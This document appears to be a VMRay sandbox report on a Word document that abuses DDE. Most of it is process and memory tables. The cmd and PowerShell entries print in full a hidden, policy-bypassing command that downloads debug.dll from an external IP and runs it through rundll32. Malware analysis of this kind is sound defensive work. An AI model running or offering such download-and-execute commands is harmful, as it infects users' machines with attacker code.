Macro-less Word Doc. uses DDE to Execute Powershell, Download DLL | Grouped Behavior
Try VMRay Analyzer
|
The sample contacted only unknown URLs. |
| URL | Connection Successful | Reputation Status |
|---|---|---|
| 213.183.51.187/debug.dll |
|
Unknown
|
| Hostname | IP Addresses | Country | City | Protocols | Has Blacklisted URL |
|---|---|---|---|---|---|
| 213.183.51.187 | NL | Amsterdam | HTTP, TCP |
|
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\office15\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:09, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:06 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x98c |
| Parent PID | 0x618 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9C4
0x
9C0
0x
9BC
0x
9B8
0x
9B4
0x
9B0
0x
9A4
0x
9A0
0x
99C
0x
998
0x
994
0x
990
0x
A0C
0x
A94
0x
D24
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x001b7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001d0000 | 0x001d0000 | 0x002cffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x003d0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000400000 | 0x00400000 | 0x00401fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000410000 | 0x00410000 | 0x00419fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000420000 | 0x00420000 | 0x0042ffff | Private Memory |
|
|
|
|
|
| private_0x0000000000430000 | 0x00430000 | 0x0052ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000530000 | 0x00530000 | 0x00560fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000570000 | 0x00570000 | 0x0057ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000580000 | 0x00580000 | 0x0065efff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000660000 | 0x00660000 | 0x00666fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000670000 | 0x00670000 | 0x00671fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000680000 | 0x00680000 | 0x00680fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000690000 | 0x00690000 | 0x00691fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000006a0000 | 0x006a0000 | 0x006a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000006b0000 | 0x006b0000 | 0x006bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000006c0000 | 0x006c0000 | 0x006c0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000006d0000 | 0x006d0000 | 0x006d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000006e0000 | 0x006e0000 | 0x006e0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x006f0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000700000 | 0x00700000 | 0x007fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000800000 | 0x00800000 | 0x00800fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000810000 | 0x00810000 | 0x00810fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000820000 | 0x00820000 | 0x00820fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000830000 | 0x00830000 | 0x00830fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000840000 | 0x00840000 | 0x00840fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000850000 | 0x00850000 | 0x00850fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000860000 | 0x00860000 | 0x00860fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000870000 | 0x00870000 | 0x00870fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000880000 | 0x00880000 | 0x00880fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000890000 | 0x00890000 | 0x00890fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000008a0000 | 0x008a0000 | 0x008affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000008b0000 | 0x008b0000 | 0x009affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009b0000 | 0x009b0000 | 0x009cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009d0000 | 0x009d0000 | 0x009d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009e0000 | 0x009e0000 | 0x009effff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x009f0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000a00000 | 0x00a00000 | 0x00a0ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x00a13fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a20000 | 0x00a20000 | 0x00a20fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a30000 | 0x00a30000 | 0x00a30fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a40000 | 0x00a40000 | 0x00a7ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000a80000 | 0x00a80000 | 0x00a81fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000a90000 | 0x00a90000 | 0x00acffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000ad0000 | 0x00ad0000 | 0x00ad0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000ae0000 | 0x00ae0000 | 0x00ae0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| msxml6r.dll | 0x00af0000 | 0x00af0fff | Memory Mapped File | Readable |
|
|
|
|
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db | 0x00b00000 | 0x00b25fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000b30000 | 0x00b30000 | 0x00b30fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000b40000 | 0x00b40000 | 0x00b7ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| c_1255.nls | 0x00b80000 | 0x00b90fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000ba0000 | 0x00ba0000 | 0x00c9ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000ca0000 | 0x00ca0000 | 0x01092fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000010a0000 | 0x010a0000 | 0x010a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000010b0000 | 0x010b0000 | 0x010b0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000010c0000 | 0x010c0000 | 0x010c0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000010d0000 | 0x010d0000 | 0x010eefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000010f0000 | 0x010f0000 | 0x010f0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001100000 | 0x01100000 | 0x01100fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001110000 | 0x01110000 | 0x0111ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001120000 | 0x01120000 | 0x0119ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000011a0000 | 0x011a0000 | 0x011a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000011b0000 | 0x011b0000 | 0x011b0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000011c0000 | 0x011c0000 | 0x012bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000012c0000 | 0x012c0000 | 0x012c0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000012d0000 | 0x012d0000 | 0x012d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000012e0000 | 0x012e0000 | 0x012e0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000012f0000 | 0x012f0000 | 0x012f0fff | Private Memory | Readable, Writable |
|
|
|
|
| winword.exe | 0x01300000 | 0x014d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x00000000014e0000 | 0x014e0000 | 0x020dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x020e0000 | 0x023aefff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000023b0000 | 0x023b0000 | 0x023b0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023c0000 | 0x023c0000 | 0x023c0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023d0000 | 0x023d0000 | 0x023d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023e0000 | 0x023e0000 | 0x023e0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023f0000 | 0x023f0000 | 0x023f0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002400000 | 0x02400000 | 0x02400fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002410000 | 0x02410000 | 0x02410fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002420000 | 0x02420000 | 0x02420fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002430000 | 0x02430000 | 0x02430fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002440000 | 0x02440000 | 0x02440fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002450000 | 0x02450000 | 0x02450fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002460000 | 0x02460000 | 0x02461fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000024f0000 | 0x024f0000 | 0x025effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002640000 | 0x02640000 | 0x0273ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002760000 | 0x02760000 | 0x0279ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000027a0000 | 0x027a0000 | 0x02b9ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| staticcache.dat | 0x02ba0000 | 0x034cffff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000034d0000 | 0x034d0000 | 0x03ccffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003d10000 | 0x03d10000 | 0x03d4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003db0000 | 0x03db0000 | 0x03dbffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003dd0000 | 0x03dd0000 | 0x03ecffff | Private Memory | Readable, Writable |
|
|
|
|
| segoeui.ttf | 0x03ed0000 | 0x03f4efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000003f80000 | 0x03f80000 | 0x0407ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x04080000 | 0x0413ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000004140000 | 0x04140000 | 0x0423ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004240000 | 0x04240000 | 0x0433ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004340000 | 0x04340000 | 0x0443ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004440000 | 0x04440000 | 0x0453ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004560000 | 0x04560000 | 0x0465ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000004660000 | 0x04660000 | 0x04a5ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| seguisb.ttf | 0x04a60000 | 0x04ac3fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000004b10000 | 0x04b10000 | 0x04b4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004d30000 | 0x04d30000 | 0x04d6ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004d70000 | 0x04d70000 | 0x0516ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000005170000 | 0x05170000 | 0x0536ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000005370000 | 0x05370000 | 0x0576ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000005770000 | 0x05770000 | 0x05f6ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000005f70000 | 0x05f70000 | 0x06370fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006380000 | 0x06380000 | 0x06780fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006790000 | 0x06790000 | 0x06b90fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006ba0000 | 0x06ba0000 | 0x06d9ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006da0000 | 0x06da0000 | 0x0725ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000007260000 | 0x07260000 | 0x0765ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000007660000 | 0x07660000 | 0x07e5ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000036890000 | 0x36890000 | 0x3689ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| osppc.dll | 0x63a70000 | 0x63a9cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| riched20.dll | 0x63aa0000 | 0x63c2dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| adal.dll | 0x63c30000 | 0x63ce4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mscoreei.dll | 0x63cf0000 | 0x63d69fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dwrite.dll | 0x63e40000 | 0x63f49fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d3d10warp.dll | 0x63f50000 | 0x6407bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msores.dll | 0x64080000 | 0x68d6afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mso.dll | 0x68d70000 | 0x6a653fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wwlib.dll | 0x6a660000 | 0x6bb1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mscoree.dll | 0x6bb30000 | 0x6bb79fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d3d11.dll | 0x6bb80000 | 0x6bc02fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msptls.dll | 0x6bc10000 | 0x6bd25fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msointl.dll | 0x6bd30000 | 0x6c0a0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wwintl.dll | 0x6c0b0000 | 0x6c16ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d2d1.dll | 0x6c170000 | 0x6c229fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oart.dll | 0x6c230000 | 0x6cfd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winspool.drv | 0x6f5b0000 | 0x6f600fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msxml6.dll | 0x6fa80000 | 0x6fbd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| office.odf | 0x70ac0000 | 0x70fbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msi.dll | 0x70fc0000 | 0x711fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcp100.dll | 0x71230000 | 0x71298fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcr100.dll | 0x712a0000 | 0x7135efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dxgi.dll | 0x716f0000 | 0x71772fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
|
For performance reasons, the remaining 172 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | c:\Windows\System32\cmd.exe /k powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','%temp%debug.dll');rundll32.exe '%temp%debug.dll' HOK |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:20, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
| Information | Value |
|---|---|
| PID | 0xa38 |
| Parent PID | 0x98c (c:\program files\microsoft office\office15\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A3C
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\BGC6u8Oy yXGxkR\Desktop | type = file_attributes |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | powershell.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE |
|
7 | ||
| Open | STD_INPUT_HANDLE |
|
2 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 16, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0xa50, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e50000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76590000 |
|
2 | |
| Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = c:\Windows\System32\cmd.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x765e24c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x765cac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x765e2732 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-10-11 11:01:08 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 54241 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
5 | ||
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = temp, result_out = C:\Users\BGC6U8~1\AppData\Local\Temp |
|
2 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\BGC6u8Oy yXGxkR\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD, value = 0 |
|
1 |
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll');rundll32.exe 'C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll' HOK |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:20, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
| Information | Value |
|---|---|
| PID | 0xa50 |
| Parent PID | 0xa38 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A54
0x
A60
0x
A6C
0x
A78
0x
A8C
0x
A90
0x
AA8
0x
AAC
0x
AB0
0x
AB4
0x
AEC
0x
D18
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8oy yxgxkr\appdata\local\tempdebug.dll | 519.00 KB (531456 bytes) |
MD5:
64b2ac701a0d67da134e13b2efc46900
SHA1: 1bb516d70591a5a0eb55ee71f9f38597f3640b14 SHA256: f3f55c3df39b85d934121355bed439b53501f996e9b39d4abed14c7fe8081d92 |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
